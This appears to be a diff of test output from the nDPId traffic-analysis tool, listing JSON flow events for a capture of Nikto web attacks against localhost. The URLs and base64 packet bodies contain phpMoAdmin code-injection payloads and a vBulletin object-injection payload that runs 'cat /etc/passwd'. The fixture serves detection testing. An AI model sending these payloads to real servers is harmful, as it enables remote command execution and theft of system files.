00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\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"} -01383{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 
+01383{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\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"} -01390{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 
